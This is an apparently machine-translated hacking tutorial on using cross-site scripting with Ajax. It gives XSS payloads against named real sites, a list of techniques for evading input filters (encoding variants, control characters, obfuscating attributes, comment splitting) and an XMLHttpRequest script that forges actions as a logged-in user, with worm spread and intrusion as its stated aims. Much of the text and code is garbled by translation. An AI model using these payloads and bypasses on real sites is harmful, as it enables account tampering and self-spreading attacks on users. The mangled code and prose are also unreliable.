Ajax hacking with XSS

ArticleDirectory

• Ajax hacking
• XSS usage
• URL XSS
• Input, textarea, and CSS XSS
• Embed XSS
• RSS and XML XSS
• Code Insertion Method
• Filter Bypass Methods
• Asynchronous Data Call
• Summary

Why is XSS used in Ajax hacking? What is the difference between XSS and traditional XSS? What are their respective advantages and disadvantages? Is the so-called XSS vulnerability of a large website a weakness? Let's take a detailed analysis.

Ajax hacking

The term Ajax hacking first appeared in Billy Hoffman's "ajax dangers" report. He defined Samy and yamanner as Ajax hacking. Before that, they were said to belong to the Web worm (or xssworm), but there was no clear definition of this attack form. Here we will discuss the XSS in Ajax hacking in depth. For other types of Ajax attacks, please refer to the article "Top 10 Ajax security holes and driving factors" on the Internet or translate them into Chinese "Top 10 security threats under Web".

In traditional XSS attacks, we usually aim to directly escalate permissions or obtain cookies and then escalate permissions.CodeGenerally, the execution method is windows. Open, window. Location, or IFRAME. Therefore, its two major weaknesses are shown, which are not propagation or violent. The new Ajax technology is used in Ajax hacking to transform attack methods and objects. In fact, most people do what they can do after obtaining administrator permissions and having File Change permissions. They seldom design trade secrets! This attack directly targets the client. Because all the data is obtained asynchronously, it has a strong concealment capability. By manipulating the user permissions that have been logged on, you can directly change user information, or even make the code set automatically spread to implement the worm function.

XSS usage

In the spread of XSS attacks, code insertion is typically used in URL and text areas (textarea. However, for a site that has recently used Ajax technology to build a site, using the new form of Ajax hacking technology, you can extend the method to the URL domain, input domain, textarea domain, embed domain, CSS, RSS, and XML vector in seven ways.

URL XSS

The xss url is generally "(Domain Name)/(File Name) (File Format )? (Field name) = (field content) ", and the field content is usually displayed or called at a location on the page. Due to the negligence of the website writers, the website did not perform security detection and filtering on the field content, but directly called to the page, so that we can only replace the field content with the XSS code we want to generate cross-site. For example:

Http://club.sohu.com/joke/1.htm? Stra = <SCRIPT> alert (document. Cookie); </SCRIPT>

However, this method usually needs to trick users into clicking the link you forged in advance, and you can link them to a forum or use e-mail for phishing.

Input, textarea, and CSS XSS

Input, textarea, and css xss are the most widely used methods. Since CSS actually belongs to a part of DHTML, their usage methods and bypassing filtering features are also similar, we will focus on relevant explanations and experiments later.

Embed XSS

Embed XSS is generally used on websites that allow video, music, and Flash insertion. If you link to a flash file that is maliciously constructed with XSS scripts, for example, <embed src = "xss.swf"> </embed>. Then, we construct a special .swf file and insert the JS or vbs code referenced by Action Script into the action of the flash file. When a user accesses this page, the cross-site is generated.

RSS and XML XSS

This type of attack is generally used on sites that can be RSS aggregated and some local RSS interpreters (it is said that XSS is performed on the local RSS interpreter, there is a possibility of obtaining host permissions, but I have not tried this !), In addition, because RSS files can be referenced on any site, it is very easy to test such attacks, and the effect is quite obvious. The following is an example of calling remote RSS. xml locally without any filtering settings, and the filtering effect of Google calling this RSS.

Code Insertion Method

Because the inserted script is JS or vbs, all general keywords such as JavaScript, VBScript, and expression, such as , however, the three keywords can be omitted when the mouse or keyboard response is received, so the following method is used: or <input onkeyup =" alert ('xss'); ">. Because HTML does not follow the XHTML standard, you can insert the following methods:

1. Tag attributes can be enclosed in double quotes, single quotes, or no quotation marks;
2. Attribute values can be in upper case, lower case, or mixed write;
3. You can insert a carriage return, including the end character and line break, namely, char (10), char (13), and Tab space;
4. If the style format is used, you can insert the Backslash "\" and the annotator "/**/".
5. The inserted code can be converted to hexadecimal or hexadecimal;
6. Due to the uncertainty of the prohibitions, you can insert a series of conversion strings and combine them at will;
7. The following 15 encoding methods can be used to import the character "J", which is case-insensitive.

\ 6a \ 06a \ 006a \ 0006a \ 20.6a // hexadecimal code in Java format

& #106; & #0106; & #00106; & #000106; & #0000106; // decimal encoding

& # X6a; & # x06a; & # x006a; & # x0006a; & # x00006a; // hexadecimal code

8. Other encoding methods, such as htmlencode and urlencode, are used to encode HTML and URL.

As for HTML tags that can insert code ...... To put it bluntly, almost all labels that can insert attributes can insert Code, for example, <bstyle = "XSS: expression (Alert ('xss')">.

The attributes of codes that can be inserted in HTML tags are SRC, style, and DYNSRC (commonly used in IMG and input, and this attribute can also be used to insert videos), lowsrc (preload thumbnail), mouse properties (such as o n m o u s e o v e r), keyboard properties (such as onkeypress), href attributes (commonly used in A and link), Boby onload attributes, URL attributes, and so on.

Filter Bypass Methods

Of course, it is impossible for other websites to let you enter the code, so they usually filter the characters you enter. Therefore, the compiled code can be smoothly inserted and executed, and some key characters may be filtered out, such as "JavaScript ". If this is the only filtering method, it is too simple to bypass the method. You only need to enter "javajavascriptscript" or another character whenever you enter this character. Of course websiteProgramThe staff will not be so stupid, they will conduct various filtering to guard against you, so combined with the above "code insertion method", you may summarize the following methods to bypass the website filtering system:

1. Fill in with the ASCII code of the Control Character

For example, if you are familiar with ASCII codes, you should know that the total number of system control characters is 33, remove one header & #00 (null) and one tail & #127 (DEL). The other 31 characters can be smoothly inserted into the code header to confuse the filtering system, it does not affect the execution of the original code, and you can still use solution 7 in "code Insertion Method" to perform arbitrary conversion of encoding. Seven TAB characters & #9, line breaks & #10, carriage returns & #13 can be inserted anywhere in the code.

2. Insert obfuscation attributes

When we perform common text input, we will find that not all characters with "performanceipt" will be filtered out. But only special characters in the HTML Tag will be filtered out, which gives us a set of bypassing Measures to insert another obfuscation Attribute before the attributes of the inserted code, insert the characters in this attribute that make the filtering system mistakenly think of as the tag Terminator, so that the filtering system considers the code to be executed outside the HTML Tag. For example:

// Insert the obfuscation of SRC.

<SCRIPT> [Code] </SCRIPT>"> // Insert the double quotation marks and the ">" symbol of mixed quotation marks.

<Script a = ">" src = "XSS. js"> </SCRIPT> // Insert the obfuscated A attribute.

3. Use annotator to separate

Because the browser ignores the annotator of each type of code, if we use the annotator in the code, we can successfully fool the filtering system without affecting the normal operation of the XSS code. For example:

// The comments of CSS are/**/, and the content is ignored.

<Style> @ im \ port '\ ja \ Vasc \ rept: Alert ("XSS")'; </style> // The symbols ignored in CSS are also "\"

EXP/* <a style = 'no \ XSS: noxss ("* // *"); XSS: & #101; X & # x2f; * XSS * // */expression (Alert ("XSS") '> // comment the obfuscated appearance

<Style> <! -- </Style> <SCRIPT> [Code] // --> </SCRIPT> // The HTML annotator is <! -- Comment -->

4. js coding and calling

If the filter system filters out many feature characters, it will be very troublesome when we bypass the above steps, therefore, the typical bypass scheme also involves JS coding for the code or simply calling it from the outside. Of course, because of the browser's Ajax security mechanism, you must ensure that the called files are on the same server; otherwise, an error message will appear.

Asynchronous Data Call

Since it is Ajax hacking, it is natural to use Asynchronous Data calls. Here we will briefly introduce the relevant knowledge. A deeper understanding is the result of long-term practice.

1. Declare the XMLHTTPRequest object

Before calling data, you must declare the XMLHTTPRequest object. The simplest method in IE6 and earlier versions is:

VaR XMLHTTP = new activexobject ("Microsoft. XMLHTTP ");

The declaration method in IE7 and Firefox is:

VaR Req = new XMLHttpRequest ();

Therefore, if we want to compile code with better compatibility, we can judge the client browser and define the XMLHTTPRequest object separately, as shown below:

If (window. XMLHttpRequest ){
XMLHTTP = new XMLHttpRequest ();
} Else if (window. activexobject ){
XMLHTTP = new activexobject ('Microsoft. xmlhttp ');
}

Then use the following method to pass Parameters

XMLHTTP. Open ("Post", "url", true );
XMLHTTP. Send (null );

Here, the first option in XMLHTTP. open is the page request method, which can be post, get, and head. The third option is true, indicating asynchronous mode and false indicating synchronous mode.

With the above code, you can simply add a friendly link for any user to the current user in the Tom blog. If the link is added successfully, the OK window is returned. If the link is added successfully, friended is returned. The Code is as follows:

<SCRIPT>
VaR XMLHTTP = new activexobject ("Microsoft. XMLHTTP ");
XMLHTTP. Open ("Post", "http://blog.tom.com/manage/favorite/friend_list.php? Username = monyer1 & flag = 1 ", true );
XMLHTTP. Send (null)
XMLHTTP. onreadystatechange = serverprocess;
Function serverprocess (){
If (XMLHTTP. readystate = 4 | XMLHTTP. readystate = 'complete ')
Alert (XMLHTTP. responsetext );}
</SCRIPT>
Using the same principle, it is not difficult to add articles to login users, but it is a little troublesome. Interested friends can try it on their own.

The code for declaring XMLHttpRequest in v B s c r I p t is as follows:

Dim httpreq as MSXML. XMLHttpRequest
Set httpreq = new XMLHttpRequest
Httpreq. setrequesttheader "Content-Type:", "text/XML; Charest = gb2312"
Httpreq, send
The method of exploits is roughly the same as that of JavaScript, so there is not much instant processing here.

2. Get page elements

The following DOM objects are generally used to obtain the values of the specified tag and tag on the page. Of course, related attributes such as style, value, and innerhtml can be added to the object.

1) document. getelementbyld // obtain the HTML Tag Information with the specified ID

2) document. getelementbyname // obtain the HTML Tag Information of the specified name

3) document. getelementbytagname // obtain the specified HTML Tag Information

3. insert HTML elements into the page

In my guidance, JS functions that can insert HTML on the page include insertadjacenthtml, innerhtml (outerhtml), inseradjacenttext, and innertext (outertext ). The first two are HTML code insertion and the last two are text insertion. Therefore, we generally use the first two. In addition, you can use createlement in the Document Object to insert code. Pay attention to the Case sensitivity when entering JavaScript code.

1) <a href = "#" onclick = "this. innerhtml = '

2) <a href = "#" onclick = "this. outerhtml = '

3) <a onclick = "this. insertadjacenthtml ('afterend',

Specifies where HTML tag statements are inserted. Four values are used:

A. beforebegin: inserted after the tag starts Marking

B. afterbegin: inserted after the tag starts Marking

C. beforeend: insert it to the end mark of the tag.

D. afterend: insert to the end tag of the tag.

The flexible use of these two functions can help us transform the rich effects, I use Baidu space to insert video simplified PoC:

The code of the HTML page is:

<SCRIPT scr = monyerflash. js> </SCRIPT>
<Address> src = http: // TV .mofile.com/cn/xplayer.swf? V = 9 iwkfise </address>
Monyerflash. js code:

Window. onload = function (){
VaR I, j, x, y, z;
J = Document. getelementsbytagname ('address ');
For (I = 0; I <J. length; I ++ ){
Y = Document. getelementsbytagname ('address') [I];
Z = Document. getelementsbytagname ('address') [I]. firstchild. Data;
X = '<br/> <embed' + Z + '> </embed> ';
If (y) Y. insertadjacenthtml ('beforeend'. X );
}}

Summary

with the above summary, I believe you have a general understanding of Ajax hacking with XSS, and you only need to make a simple combination and change of the response content in the text, it is very likely to make some surprising things. Of course, because Ajax is a part of JavaScript, you need to have a full understanding of JavaScript to make full use of Ajax hacking and exert its power. When you are dealing with various filtering systems, you will encounter more difficulties and need to try to solve various problems. I think it is secondary to truly intrude into a website or successfully mount a trojan. I am constantly improving myself and seeking breakthroughs in the unity of power and defense!